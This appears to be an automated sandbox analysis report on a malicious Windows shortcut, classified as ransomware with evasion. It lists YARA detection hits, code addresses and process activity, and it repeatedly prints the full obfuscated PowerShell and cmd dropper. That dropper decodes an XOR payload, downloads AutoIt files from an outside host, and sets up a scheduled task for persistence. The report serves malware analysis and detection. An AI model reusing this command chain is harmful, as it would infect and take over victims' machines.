vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;^& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;&mkdir c:\GSlLzFnTov & attrib +h c:\GSlLzFnTov & cd /d c:\GSlLzFnTov & copy c:\windows\system32\curl.exe GSlLzFnTov.exe & GSlLzFnTov -k -o AutoIt3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey0 & GSlLzFnTov -k -o QwbpjvdmTA.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey1 & sc^htas^ks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3"

Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DC1B00	8_2_00007FF7F1DC1B00
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1D9A9B4	8_2_00007FF7F1D9A9B4
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DDE930	8_2_00007FF7F1DDE930
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DA44A4	8_2_00007FF7F1DA44A4
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DDCB60	8_2_00007FF7F1DDCB60
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DA0658	8_2_00007FF7F1DA0658
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DABDE0	8_2_00007FF7F1DABDE0
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DBADC8	8_2_00007FF7F1DBADC8
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DAB840	8_2_00007FF7F1DAB840
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1D91AB0	8_2_00007FF7F1D91AB0
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DB49D0	8_2_00007FF7F1DB49D0
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DD2930	8_2_00007FF7F1DD2930
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DBE4F0	8_2_00007FF7F1DBE4F0
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DC2C88	8_2_00007FF7F1DC2C88
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DAF458	8_2_00007FF7F1DAF458
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DA0C74	8_2_00007FF7F1DA0C74
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DCCBDC	8_2_00007FF7F1DCCBDC
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DA7BAC	8_2_00007FF7F1DA7BAC
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DA9B60	8_2_00007FF7F1DA9B60
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1D9BB5B	8_2_00007FF7F1D9BB5B
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DD8350	8_2_00007FF7F1DD8350
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1D9DEA0	8_2_00007FF7F1D9DEA0
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DE0E40	8_2_00007FF7F1DE0E40
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1D9C55E	8_2_00007FF7F1D9C55E
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1D9C571	8_2_00007FF7F1D9C571
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1D9C538	8_2_00007FF7F1D9C538
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1D9C54B	8_2_00007FF7F1D9C54B
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DE4D1C	8_2_00007FF7F1DE4D1C
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DB88D8	8_2_00007FF7F1DB88D8
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DCD884	8_2_00007FF7F1DCD884
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DB7888	8_2_00007FF7F1DB7888
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1D94860	8_2_00007FF7F1D94860
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DD0804	8_2_00007FF7F1DD0804
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DCF810	8_2_00007FF7F1DCF810
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DE473C	8_2_00007FF7F1DE473C
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1D9C719	8_2_00007FF7F1D9C719
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DA0F28	8_2_00007FF7F1DA0F28
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E4A9B4	12_2_00007FF700E4A9B4
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E8E930	12_2_00007FF700E8E930
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E71B00	12_2_00007FF700E71B00
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E8CB60	12_2_00007FF700E8CB60
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E544A4	12_2_00007FF700E544A4
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E5BDE0	12_2_00007FF700E5BDE0
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E6ADC8	12_2_00007FF700E6ADC8
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E50658	12_2_00007FF700E50658
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E5B840	12_2_00007FF700E5B840
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E649D0	12_2_00007FF700E649D0
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E82930	12_2_00007FF700E82930
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E41AB0	12_2_00007FF700E41AB0
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E7CBDC	12_2_00007FF700E7CBDC
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E57BAC	12_2_00007FF700E57BAC
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E4BB5B	12_2_00007FF700E4BB5B
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E59B60	12_2_00007FF700E59B60
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E88350	12_2_00007FF700E88350
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E6E4F0	12_2_00007FF700E6E4F0
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E72C88	12_2_00007FF700E72C88
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E50C74	12_2_00007FF700E50C74
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E5F458	12_2_00007FF700E5F458
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E4C571	12_2_00007FF700E4C571
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E4C55E	12_2_00007FF700E4C55E
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E4C54B	12_2_00007FF700E4C54B
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E4C538	12_2_00007FF700E4C538
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E94D1C	12_2_00007FF700E94D1C
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E4DEA0	12_2_00007FF700E4DEA0
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E90E40	12_2_00007FF700E90E40
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E7F810	12_2_00007FF700E7F810
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E80804	12_2_00007FF700E80804
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E9473C	12_2_00007FF700E9473C
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E50F28	12_2_00007FF700E50F28
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E4C719	12_2_00007FF700E4C719
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E688D8	12_2_00007FF700E688D8
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E67888	12_2_00007FF700E67888
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E7D884	12_2_00007FF700E7D884
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E44860	12_2_00007FF700E44860

Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: String function: 00007FF7F1DA1E80 appears 69 times
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: String function: 00007FF700E555C4 appears 41 times
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: String function: 00007FF7F1DA50B0 appears 40 times
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: String function: 00007FF700E55658 appears 51 times
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: String function: 00007FF7F1DA5658 appears 51 times
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: String function: 00007FF7F1DB1F00 appears 234 times
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: String function: 00007FF700E550B0 appears 40 times
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: String function: 00007FF700E4A780 appears 52 times
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: String function: 00007FF7F1DA55C4 appears 41 times
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: String function: 00007FF7F1DB1FA0 appears 286 times
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: String function: 00007FF700E54FC8 appears 97 times
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: String function: 00007FF700E61FA0 appears 286 times
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: String function: 00007FF700E61F00 appears 234 times
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: String function: 00007FF7F1D9A780 appears 52 times
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: String function: 00007FF7F1DA4FC8 appears 97 times
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: String function: 00007FF700E51E80 appears 69 times

Source: knfV5IVjEV.lnk, type: SAMPLE	Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: amsi64_7732.amsi.csv, type: OTHER	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: 00000003.00000002.1385766867.000001EFF7B59000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: 00000003.00000002.1383867622.000001EFF7AE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: Process Memory Space: powershell.exe PID: 7548, type: MEMORYSTR	Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: Process Memory Space: powershell.exe PID: 7548, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7732, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal100.rans.evad.winLNK@25/11@1/2

Source: C:\GSlLzFnTov\GSlLzFnTov.exe

Code function: 8_2_00007FF7F1D93434 CreateToolhelp32Snapshot,GetLastError,CloseHandle,Module32First,Module32Next,

8_2_00007FF7F1D93434

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\Desktop\knfV5IVjEV

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7688:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q4mfwfxv.t0x.ps1

Jump to behavior

Source: C:\Windows\System32\conhost.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: knfV5IVjEV.lnk	ReversingLabs: Detection: 21%
Source: knfV5IVjEV.lnk	Virustotal: Detection: 29%

Source: GSlLzFnTov.exe	String found in binary or memory: curl: try 'curl --help' for more information
Source: GSlLzFnTov.exe	String found in binary or memory: curl: try 'curl --help' for more information
Source: GSlLzFnTov.exe	String found in binary or memory: This is not the full help, this menu is stripped into categories. Use "--help category" to get an overview of all categories. For all options use the manual or "--help all".
Source: GSlLzFnTov.exe	String found in binary or memory: This is not the full help, this menu is stripped into categories. Use "--help category" to get an overview of all categories. For all options use the manual or "--help all".
Source: GSlLzFnTov.exe	String found in binary or memory: This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all".
Source: GSlLzFnTov.exe	String found in binary or memory: This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all".
Source: GSlLzFnTov.exe	String found in binary or memory: curl: try 'curl --help' for more information
Source: GSlLzFnTov.exe	String found in binary or memory: curl: try 'curl --help' for more information
Source: GSlLzFnTov.exe	String found in binary or memory: curl: try 'curl --help' for more information
Source: GSlLzFnTov.exe	String found in binary or memory: curl: try 'curl --help' for more information
Source: GSlLzFnTov.exe	String found in binary or memory: This is not the full help, this menu is stripped into categories. Use "--help category" to get an overview of all categories. For all options use the manual or "--help all".
Source: GSlLzFnTov.exe	String found in binary or memory: This is not the full help, this menu is stripped into categories. Use "--help category" to get an overview of all categories. For all options use the manual or "--help all".
Source: GSlLzFnTov.exe	String found in binary or memory: This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all".
Source: GSlLzFnTov.exe	String found in binary or memory: This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all".
Source: GSlLzFnTov.exe	String found in binary or memory: curl: try 'curl --help' for more information
Source: GSlLzFnTov.exe	String found in binary or memory: curl: try 'curl --help' for more information

Source: unknown	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sLkrGsZRCfGabaMfKpxFsSpWKAhNPssJmxQAcjvWqTWLATHZCqoATzGzvpHekkckNXPBjjczUAozVEuRUijweRQLSofNBqLfRLXEeePsnNHrmfESURkbbEfWgcLVepXBQiKiGQMPtRiqhxyLJoTMfJdkFbwbsToYRfAcvvjedvHjuQNHCakQwkvfexCFsKuzAkzcXvpndNHJbTQQnPxsGyzEJuYXSEMtbgHipKLgLYLJBMekHNsCkbUcLVtBxrvyboHVkGzBdrHJNRcWpModkhhZnExuqhJsAmGodjabnQyUtjpUSwmLcsnTfJGFifkVHphAiPSfLnRvJoFdoCBTWXpiYPhuBuTgECkdcPLdEfZQASjSdCqFCrZKZYBuGwCquJSecAazSxoQXzGfCprYdmCmEzedkpwhAJtSaeQ00001DA5xqwRqfFmhfEzAvXoBbfnogPfxyQunyxhuNGMPxfcWvkMuEofFAjcYWxrBrsSqjZJHwfNQjydVdrTVcKUkJQMoujxpojwfoMLwBeYyAqubggUEEvyGyGGumtmnGwzacYGrFvsYMuKsuKhnpUKTLRGHeqjhSKSdQtZhzBZidzVdXnaBmYYNNHpmrZmomjgbBFCaLZNMVAQjVBLRqGWTMdpheNRzqKXTtTzqKaSmkkTkTeqPouYEonoypuVXimvkCWQbbufpQJHzjepZvbmVLsEgEbapeUdYQHGWpoNUoJPFEPokeWzgZzzkqJwatRkVEJLBwsKhosFcCZBQMPjhtXYphvEFSNyxwTaVcMPMksSGUwHrgGnFGcAHKutaNdpAThEKYGNaZxWaeruKNnyjzTStrrkGrNYhdpPLTXszUmGhfABsaKmzEebZqksGvfJkyPXPBJSRUZqnmJnQQSGGzwCYoPuGEMePCuJrENQqTvGEPNNHXBRCxbKckZzPojmgVAKRaWkbbpPeRYizaNJbWzqALFfEnbcHjyKmdWGbrQAhnFknQaNzzjktkiftQFPanfUqnXwefHKgYhoetTQnnAhZopaVQnmLaAVgLVZ\|\|goto&po^w^e^rs^he^l^l -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy^\|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^\|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy^\|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^\|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;^& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;&mkdir c:\GSlLzFnTov & attrib +h c:\GSlLzFnTov & cd /d c:\GSlLzFnTov & copy c:\windows\system32\curl.exe GSlLzFnTov.exe & GSlLzFnTov -k -o AutoIt3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey0 & GSlLzFnTov -k -o QwbpjvdmTA.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey1 & sc^htas^ks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy\|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy\|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy\|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy\|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sLkrGsZRCfGabaMfKpxFsSpWKAhNPssJmxQAcjvWqTWLATHZCqoATzGzvpHekkckNXPBjjczUAozVEuRUijweRQLSofNBqLfRLXEeePsnNHrmfESURkbbEfWgcLVepXBQiKiGQMPtRiqhxyLJoTMfJdkFbwbsToYRfAcvvjedvHjuQNHCakQwkvfexCFsKuzAkzcXvpndNHJbTQQnPxsGyzEJuYXSEMtbgHipKLgLYLJBMekHNsCkbUcLVtBxrvyboHVkGzBdrHJNRcWpModkhhZnExuqhJsAmGodjabnQyUtjpUSwmLcsnTfJGFifkVHphAiPSfLnRvJoFdoCBTWXpiYPhuBuTgECkdcPLdEfZQASjSdCqFCrZKZYBuGwCquJSecAazSxoQXzGfCprYdmCmEzedkpwhAJtSaeQ00001DA5xqwRqfFmhfEzAvXoBbfnogPfxyQunyxhuNGMPxfcWvkMuEofFAjcYWxrBrsSqjZJHwfNQjydVdrTVcKUkJQMoujxpojwfoMLwBeYyAqubggUEEvyGyGGumtmnGwzacYGrFvsYMuKsuKhnpUKTLRGHeqjhSKSdQtZhzBZidzVdXnaBmYYNNHpmrZmomjgbBFCaLZNMVAQjVBLRqGWTMdpheNRzqKXTtTzqKaSmkkTkTeqPouYEonoypuVXimvkCWQbbufpQJHzjepZvbmVLsEgEbapeUdYQHGWpoNUoJPFEPokeWzgZzzkqJwatRkVEJLBwsKhosFcCZBQMPjhtXYphvEFSNyxwTaVcMPMksSGUwHrgGnFGcAHKutaNdpAThEKYGNaZxWaeruKNnyjzTStrrkGrNYhdpPLTXszUmGhfABsaKmzEebZqksGvfJkyPXPBJSRUZqnmJnQQSGGzwCYoPuGEMePCuJrENQqTvGEPNNHXBRCxbKckZzPojmgVAKRaWkbbpPeRYizaNJbWzqALFfEnbcHjyKmdWGbrQAhnFknQaNzzjktkiftQFPanfUqnXwefHKgYhoetTQnnAhZopaVQnmLaAVgLVZ\|\|goto&po^w^e^rs^he^l^l -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy^\|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^\|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy^\|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^\|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;^& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;&mkdir c:\GSlLzFnTov & attrib +h c:\GSlLzFnTov & cd /d c:\GSlLzFnTov & copy c:\windows\system32\curl.exe GSlLzFnTov.exe & GSlLzFnTov -k -o AutoIt3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey0 & GSlLzFnTov -k -o QwbpjvdmTA.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey1 & sc^htas^ks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
